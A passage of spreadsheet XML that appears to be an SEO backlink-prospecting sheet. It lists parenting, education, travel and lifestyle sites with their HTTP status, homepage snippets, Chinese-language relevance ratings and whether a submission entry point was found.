        <x:v>Enjoy printable activities for learning, holidays, and fun days for kids. Find frugal &amp; simple ways to celebrate everyday without the stress. Printable Activities for Learning, Holidays, and Fun Days for Kids - Rock Your Homeschool Skip to content Join VIP Resource Library with over 600 freebies! Join VIP Resource Library with over 600 freebies! Blog Gold Star Collection Shop Cart 0 Home Welcome Start Here To Rock Your Homeschool! Contact Information Privacy Policy Cookie Policy Partner With Rock Your Homeschool! Homeschool Homeschool 101: Learn More, How to Start, &amp; Helpful Tips Homeschool Portfolios Homeschool Supplies Preschool Enchantment Homeschool Preschool Activities Life Growth Mindset Family Fun Activities &amp; More Self-Care Relaxed and Fun Homeschooling Homeschool Tips and Ideas Movement &amp; Brain Breaks Unit Studies Back to</x:v>
      </x:c>
      <x:c r="R470" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S470" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T470" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://rockyourhomeschool.net</x:v>
      </x:c>
    </x:row>
    <x:row r="471">
      <x:c r="A471" s="18" t="str">
        <x:v>470</x:v>
      </x:c>
      <x:c r="B471" s="19" t="str">
        <x:v>sassychopsticks.com</x:v>
      </x:c>
      <x:c r="C471" s="19" t="str">
        <x:v>https://sassychopsticks.com</x:v>
      </x:c>
      <x:c r="D471" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E471" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F471" s="20" t="str">
        <x:v>403</x:v>
      </x:c>
      <x:c r="G471" s="19" t="str">
        <x:v>HTTP错误</x:v>
      </x:c>
      <x:c r="H471" s="19" t="str">
        <x:v>https://sassychopsticks.com/</x:v>
      </x:c>
      <x:c r="I471" s="19" t="str">
        <x:v>Security Verification</x:v>
      </x:c>
      <x:c r="J471" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K471" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L471" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M471" s="19" t="str">
        <x:v>https://sassychopsticks.com/</x:v>
      </x:c>
      <x:c r="N471" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O471" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P471" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q471"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a349ba6669f8915d Client IP: 61.211.1.60 Open Support Ticket Please include these details when opening a support ticket so we can quickly locate the challenged request.</x:v>
      </x:c>
      <x:c r="R471" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S471" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T471" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://sassychopsticks.com</x:v>
      </x:c>
    </x:row>
    <x:row r="472">
      <x:c r="A472" s="18" t="str">
        <x:v>471</x:v>
      </x:c>
      <x:c r="B472" s="19" t="str">
        <x:v>kairosgroupau.com</x:v>
      </x:c>
      <x:c r="C472" s="19" t="str">
        <x:v>https://kairosgroupau.com</x:v>
      </x:c>
      <x:c r="D472" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E472" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F472" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G472" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H472" s="19" t="str">
        <x:v>https://kairosgroupau.com/</x:v>
      </x:c>
      <x:c r="I472" s="19" t="str"/>
      <x:c r="J472" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K472" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L472" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M472" s="19" t="str">
        <x:v>https://kairosgroupau.com/</x:v>
      </x:c>
      <x:c r="N472" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O472" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P472" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q472" s="21" t="str">
        <x:v>  ��    �:  �:                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              </x:v>
      </x:c>
      <x:c r="R472" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S472" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T472" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://kairosgroupau.com</x:v>
      </x:c>
    </x:row>
    <x:row r="473">
      <x:c r="A473" s="18" t="str">
        <x:v>472</x:v>
      </x:c>
      <x:c r="B473" s="19" t="str">
        <x:v>luckylittlelearners.com</x:v>
      </x:c>
      <x:c r="C473" s="19" t="str">
        <x:v>https://luckylittlelearners.com</x:v>
      </x:c>
      <x:c r="D473" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E473" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F473" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G473" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H473" s="19" t="str">
        <x:v>https://luckylittlelearners.com/</x:v>
      </x:c>
      <x:c r="I473" s="19" t="str">
        <x:v>Home - Lucky Little Learners</x:v>
      </x:c>
      <x:c r="J473" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K473" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L473" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M473" s="19" t="str">
        <x:v>https://luckylittlelearners.com/</x:v>
      </x:c>
      <x:c r="N473" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O473" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P473" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q473" s="21" t="str">
        <x:v>Lucky Little Learners isn't a big corporation. We're a close-knit team of master teachers with advanced degrees and decades of combined classroom experience. Home - Lucky Little Learners Skip to content Login SUBMIT A PO | Trainings | Blog Math Operations Addition Subtraction Subitizing Multiplication Word Problems Place Value Measurement &amp; Data Graphing Geometry Fractions Money &amp; Time Setup &amp; Routines Small Groups &amp; Math Centers Fact Fluency Literacy Phonological Awareness Phonics Spelling &amp; Word Work Multisyllabic Words Comprehension Vocabulary Fluency Sight Words Poetry Science of Reading Small Groups &amp; Literacy Centers Read Alouds Writing &amp; Language Grammar Writing Instruction Writing Projects Social Skills SEL &amp; Character Compassion Cooperation Empathy Honesty Kindness Manners Self Control Perseverance Respect Responsibility Brag Tags Toothy</x:v>
      </x:c>
      <x:c r="R473" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S473" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T473" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://luckylittlelearners.com</x:v>
      </x:c>
    </x:row>
    <x:row r="474">
      <x:c r="A474" s="18" t="str">
        <x:v>473</x:v>
      </x:c>
      <x:c r="B474" s="19" t="str">
        <x:v>we3travel.com</x:v>
      </x:c>
      <x:c r="C474" s="19" t="str">
        <x:v>https://we3travel.com</x:v>
      </x:c>
      <x:c r="D474" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E474" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F474" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G474" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H474" s="19" t="str">
        <x:v>https://we3travel.com/</x:v>
      </x:c>
      <x:c r="I474" s="19" t="str">
        <x:v>We3Travel - Travel News and Tips for U.S. Travelers</x:v>
      </x:c>
      <x:c r="J474" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K474" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L474" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M474" s="19" t="str">
        <x:v>https://we3travel.com/</x:v>
      </x:c>
      <x:c r="N474" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O474" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P474" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q474" s="21" t="str">
        <x:v>We3Travel is an award-winning culture, food, and adventure travel blog offering destination guides, itineraries, and family travel tips. We3Travel - Travel News and Tips for U.S. Travelers Skip to content Search... Home Travel News Travel Menu Toggle Travel News &amp; Trends United States Mexico Europe Canada Caribbean Rest of the World Adventure Travel Family Trips Food Menu Toggle Culinary Destinations Food News &amp; Trends Culture Menu Toggle Culture &amp; Society School, Family &amp; Traditions Pop Culture Icons &amp; Personalities History Menu Toggle Nostalgia Decade Hubs (60s–2000s) About Menu Toggle Contact Search... Main Menu MENU Welcome to WE3TRAVEL® Here you will find hand-crafted itineraries, destination guides, and travel tips to make your travel planning easier! We share our favorite outdoor adventures, cultural experiences, local</x:v>
      </x:c>
      <x:c r="R474" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S474" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T474" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://we3travel.com</x:v>
      </x:c>
    </x:row>
    <x:row r="475">
      <x:c r="A475" s="18" t="str">
        <x:v>474</x:v>
      </x:c>
      <x:c r="B475" s="19" t="str">
        <x:v>tvgist.com</x:v>
      </x:c>
      <x:c r="C475" s="19" t="str">
        <x:v>https://tvgist.com</x:v>
      </x:c>
      <x:c r="D475" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E475" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F475" s="20" t="str">
        <x:v>403</x:v>
      </x:c>
      <x:c r="G475" s="19" t="str">
        <x:v>HTTP错误</x:v>
      </x:c>
      <x:c r="H475" s="19" t="str">
        <x:v>https://tvgist.com/</x:v>
      </x:c>
      <x:c r="I475" s="19" t="str">
        <x:v>Attention Required! | Cloudflare</x:v>
      </x:c>
      <x:c r="J475" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K475" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L475" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M475" s="19" t="str">
        <x:v>https://tvgist.com/</x:v>
      </x:c>
      <x:c r="N475" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O475" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P475" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q475" s="21" t="str">
        <x:v>Attention Required! | Cloudflare Please enable cookies. Sorry, you have been blocked You are unable to access tvgist.com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a349ba6a0ca3e025 &amp;bull; Your IP: Click to r</x:v>
      </x:c>
      <x:c r="R475" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S475" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T475" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://tvgist.com</x:v>
      </x:c>
    </x:row>
    <x:row r="476">
      <x:c r="A476" s="18" t="str">
        <x:v>475</x:v>
      </x:c>
      <x:c r="B476" s="19" t="str">
        <x:v>foxandhazel.com</x:v>
      </x:c>
      <x:c r="C476" s="19" t="str">
        <x:v>https://foxandhazel.com</x:v>
      </x:c>
      <x:c r="D476" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E476" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F476" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G476" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H476" s="19" t="str">
        <x:v>https://foxandhazel.com/</x:v>
      </x:c>
      <x:c r="I476" s="19" t="str">
        <x:v>Fox + Hazel | free art + designs - Free modern art printables for everyone!</x:v>
      </x:c>
      <x:c r="J476" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K476" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L476" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M476" s="19" t="str">
        <x:v>https://foxandhazel.com/</x:v>
      </x:c>
      <x:c r="N476" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O476" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P476" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q476" s="21" t="str">
        <x:v>Free modern art printables for everyone! Fox + Hazel | free art + designs - Free modern art printables for everyone! Facebook Twitter Instagram Pinterest Youtube HOME BLOG TUTORIALS FREE STUFF FREE DESIGN GRAPHICS FREE PRINTABLE WALL ART PRINTABLE ACTIVITY SHEETS PRINTABLE CARDS WALLPAPERS FAVE ART SUPPLIES ABOUT POLICIES CONTACT WORK WITH ME Free Stuff Home DIY wall art Free Black and White Abstract Art Printable Set (6 Prints!) If you've been looking for a black and white abstract art printable set to finally do something with those empty walls, you're in the right place! I'm sharing six free&amp;hellip; Read more activity sheets Free Stuff Free Encouragement Flower Coloring Page Printable If you've been searching for encouraging col</x:v>
      </x:c>
      <x:c r="R476" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S476" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T476" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://foxandhazel.com</x:v>
      </x:c>
    </x:row>
    <x:row r="477">
      <x:c r="A477" s="18" t="str">
        <x:v>476</x:v>
      </x:c>
      <x:c r="B477" s="19" t="str">
        <x:v>vanpolengroup.com</x:v>
      </x:c>
      <x:c r="C477" s="19" t="str">
        <x:v>https://vanpolengroup.com</x:v>
      </x:c>
      <x:c r="D477" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E477" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F477" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G477" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H477" s="19" t="str">
        <x:v>https://vanpolengroup.com/cgi-sys/suspendedpage.cgi</x:v>
      </x:c>
      <x:c r="I477" s="19" t="str"/>
      <x:c r="J477" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K477" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L477" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M477" s="19" t="str">
        <x:v>https://vanpolengroup.com/cgi-sys/suspendedpage.cgi</x:v>
      </x:c>
      <x:c r="N477" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O477" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P477" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q477" s="21" t="str">
        <x:v>Account Suspended! Please contact our support team for further assistance. *If you’re the owner of this website and have questions, reach out to HostMonster. We’re happy to help.</x:v>
      </x:c>
      <x:c r="R477" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S477" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T477" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://vanpolengroup.com</x:v>
      </x:c>
    </x:row>
    <x:row r="478">
      <x:c r="A478" s="18" t="str">
        <x:v>477</x:v>
      </x:c>
      <x:c r="B478" s="19" t="str">
        <x:v>slayathomemother.com</x:v>
      </x:c>
      <x:c r="C478" s="19" t="str">
        <x:v>https://slayathomemother.com</x:v>
      </x:c>
      <x:c r="D478" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E478" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F478" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G478" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H478" s="19" t="str">
        <x:v>https://www.slayathomemother.com/</x:v>
      </x:c>
      <x:c r="I478" s="19" t="str">
        <x:v>Slay At Home Mother - Cleaning, Organization, &amp; Crafting</x:v>
      </x:c>
      <x:c r="J478" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K478" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L478" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M478" s="19" t="str">
        <x:v>https://www.slayathomemother.com/</x:v>
      </x:c>
      <x:c r="N478" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O478" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P478" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q478" s="21" t="str">
        <x:v>Cleaning, Organization, &amp; Crafting Slay At Home Mother - Cleaning, Organization, &amp; Crafting Skip to primary navigation Skip to main content Skip to primary sidebar Skip to footer HOME CATEGORIES CLEANING ORGANIZATION CRAFTS DIYS 14-DAY HOME RESET© HOT DEALS Slay At Home Mother Cleaning, Organization, &amp; Crafting CLEANING ORGANIZATION CRAFTS RECIPES DIYS How To Engrave Pencils + Free SVG Pencil Jig Download August 9, 2026 Leave a Comment Make these adorable laser engraved pencils with your laser machine and my free SVG pencil jig download! We're gearing up for back to school, and one item I always repurchase is....PENCILS! While shopping for our pencils this year, I had the ... Read More Declutter Your Summer – Tiny Tasks That </x:v>
      </x:c>
      <x:c r="R478" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S478" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T478" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://slayathomemother.com</x:v>
      </x:c>
    </x:row>
    <x:row r="479">
      <x:c r="A479" s="18" t="str">
        <x:v>478</x:v>
      </x:c>
      <x:c r="B479" s="19" t="str">
        <x:v>makingfrugalfun.com</x:v>
      </x:c>
      <x:c r="C479" s="19" t="str">
        <x:v>https://makingfrugalfun.com</x:v>
      </x:c>
      <x:c r="D479" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E479" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F479" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G479" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H479" s="19" t="str">
        <x:v>https://www.makingfrugalfun.com/</x:v>
      </x:c>
      <x:c r="I479" s="19" t="str">
        <x:v>Home - Making Frugal FUN</x:v>
      </x:c>
      <x:c r="J479" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K479" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L479" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M479" s="19" t="str">
        <x:v>https://www.makingfrugalfun.com/</x:v>
      </x:c>
      <x:c r="N479" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O479" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P479" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q479" s="21" t="str">
        <x:v>The home of budgeting tips, meal planning, debt pay off motivation, and frugal living ideas. Let's make frugal fun. Home - Making Frugal FUN Home About Start Here Blog Videos Work with Me Shop Contact Today’s Deals Budgeting Tips Recipes DIY &amp; Crafts Free Printables MENU Celebrate more. spend less. Simple, budget-friendly ideas to make every day feel special. Start Here View Shop Living on a budget doesn't have to suck. I teach you how to have fun while being frugal. Start Here View Shop Frugal Lifestyle Recipes Budgeting Free Printables DIY &amp; Crafts Most Recent Video Subscribe to my YouTube channel hi! I'm Shannon! Saving money and living on a budget doesn't have to be hard! In fact, it can even be fun! Let me teach you how to be frugal and reach all your family financial goals by making simple changes t</x:v>
      </x:c>
      <x:c r="R479" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S479" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T479" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://makingfrugalfun.com</x:v>
      </x:c>
    </x:row>
    <x:row r="480">
      <x:c r="A480" s="18" t="str">
        <x:v>479</x:v>
      </x:c>
      <x:c r="B480" s="19" t="str">
        <x:v>coaching-online.org</x:v>
      </x:c>
      <x:c r="C480" s="19" t="str">
        <x:v>https://coaching-online.org</x:v>
      </x:c>
      <x:c r="D480" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E480" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F480" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G480" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H480" s="19" t="str">
        <x:v>https://www.coaching-online.org/</x:v>
      </x:c>
      <x:c r="I480" s="19" t="str">
        <x:v>Coaching Online - Use Your Subconscious For Lasting Change</x:v>
      </x:c>
      <x:c r="J480" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K480" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L480" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M480" s="19" t="str">
        <x:v>https://www.coaching-online.org/</x:v>
      </x:c>
      <x:c r="N480" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O480" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P480" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q480" s="21" t="str">
        <x:v>Get FREE ✅ Access to my Coaching Online Area NOW! Your better self-knowledge will lead to more ✅fulfillment, ✅success, ✅control, and ✅self-love! Coaching Online - Use Your Subconscious For Lasting Change Skip to content Navigation Love &amp; Relationship Breakup Cheating Conflict Dating For Men For Women Healthy Relationship Love Avoidant Marriage Intimacy Soulmates Texting Psychology Anxiety Awareness BPD Emotions Empaths Habits Motivation Narcissism Self-Confidence Stress Subconscious Trauma Self-Help Clear Thinking Communication Decisions Focus Goal Setting Happy Life Manifestation Mindset Money Therapy &amp; Coaching Becoming A Coach Coaching Counseling Finding A Coach For Coaches Help for Couples Therapy ICF Family Blended Families Friendship Health Parenting Business Career Entrepreneurship Leadership Teams Spirituality Auras Shifting </x:v>
      </x:c>
      <x:c r="R480" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S480" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T480" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://coaching-online.org</x:v>
      </x:c>
    </x:row>
    <x:row r="481">
      <x:c r="A481" s="18" t="str">
        <x:v>480</x:v>
      </x:c>
      <x:c r="B481" s="19" t="str">
        <x:v>mixmirth.com</x:v>
      </x:c>
      <x:c r="C481" s="19" t="str">
        <x:v>https://mixmirth.com</x:v>
      </x:c>
      <x:c r="D481" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E481" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F481" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G481" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H481" s="19" t="str">
        <x:v>https://mixmirth.com/</x:v>
      </x:c>
      <x:c r="I481" s="19" t="str">
        <x:v>Mix Mirth Home - Mixmirth</x:v>
      </x:c>
      <x:c r="J481" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K481" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L481" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M481" s="19" t="str">
        <x:v>https://mixmirth.com/</x:v>
      </x:c>
      <x:c r="N481" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O481" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P481" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q481" s="21" t="str">
        <x:v>Mix Mirth is a food blog that introduces excellent and relatively easy recipes for different types of dishes to be cooked for breakfast, dinner. Mix Mirth Home - Mixmirth Skip to content FREE RECIPES Every day The Recipe Index Mix Mirth Home Recipes Culinary Creations Contact Search for: FREE RECIPES Every day The best moments often begin with a simple recipe. Breakfast Lunch Dessert Dinner Drinks All Recipes All the Latest Desserts Easy Healthy Zucchini Brownies Dinner Greek Meatball Bowl Snacks Cheesy Zucchini Chips Desserts Honey Roasted Peaches see All the Latest Top 10 Favorites Recipes Favorites Easy Healthy Zucchini Brownies Greek Meatball Bowl Cheesy Zucchini Chips Honey Roasted Peaches Keto Zucchini Fritters Perfect Sautéed Zucchini Recipe | Seasoned Zucchini, Boiled Zucchini Recipes, Pan of Sliced Zucchini Oatmeal Cookie Do</x:v>
      </x:c>
      <x:c r="R481" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S481" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T481" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://mixmirth.com</x:v>
      </x:c>
    </x:row>
    <x:row r="482">
      <x:c r="A482" s="18" t="str">
        <x:v>481</x:v>
      </x:c>
      <x:c r="B482" s="19" t="str">
        <x:v>air-o-tech.co.za</x:v>
      </x:c>
      <x:c r="C482" s="19" t="str">
        <x:v>https://air-o-tech.co.za</x:v>
      </x:c>
      <x:c r="D482" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E482" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F482" s="20"/>
      <x:c r="G482" s="19" t="str">
        <x:v>无法连接</x:v>
      </x:c>
      <x:c r="H482" s="19" t="str"/>
      <x:c r="I482" s="19" t="str"/>
      <x:c r="J482" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="K482" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="L482" s="19" t="str">
        <x:v>未取得页面</x:v>
      </x:c>
      <x:c r="M482" s="19" t="str">
        <x:v>https://air-o-tech.co.za</x:v>
      </x:c>
      <x:c r="N482" s="19" t="str">
        <x:v>无法核验</x:v>
      </x:c>
      <x:c r="O482" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P482" s="21" t="str">
        <x:v>首页超时或无法连接，不能据此判断站点是否接受外链。</x:v>
      </x:c>
      <x:c r="Q482" s="21" t="str"/>
      <x:c r="R482" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S482" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T482" s="21" t="str">
        <x:v>fetch failed | fetch failed | 请求: https://air-o-tech.co.za
http://air-o-tech.co.za</x:v>
      </x:c>
    </x:row>
    <x:row r="483">
      <x:c r="A483" s="18" t="str">
        <x:v>482</x:v>
      </x:c>
      <x:c r="B483" s="19" t="str">
        <x:v>itsallyouboo.com</x:v>
      </x:c>
      <x:c r="C483" s="19" t="str">
        <x:v>https://itsallyouboo.com</x:v>
      </x:c>
      <x:c r="D483" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E483" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F483" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G483" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H483" s="19" t="str">
        <x:v>https://itsallyouboo.com/</x:v>
      </x:c>
      <x:c r="I483" s="19" t="str">
        <x:v>It's All You Boo</x:v>
      </x:c>
      <x:c r="J483" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K483" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L483" s="19" t="str">
        <x:v>未发现</x:v>
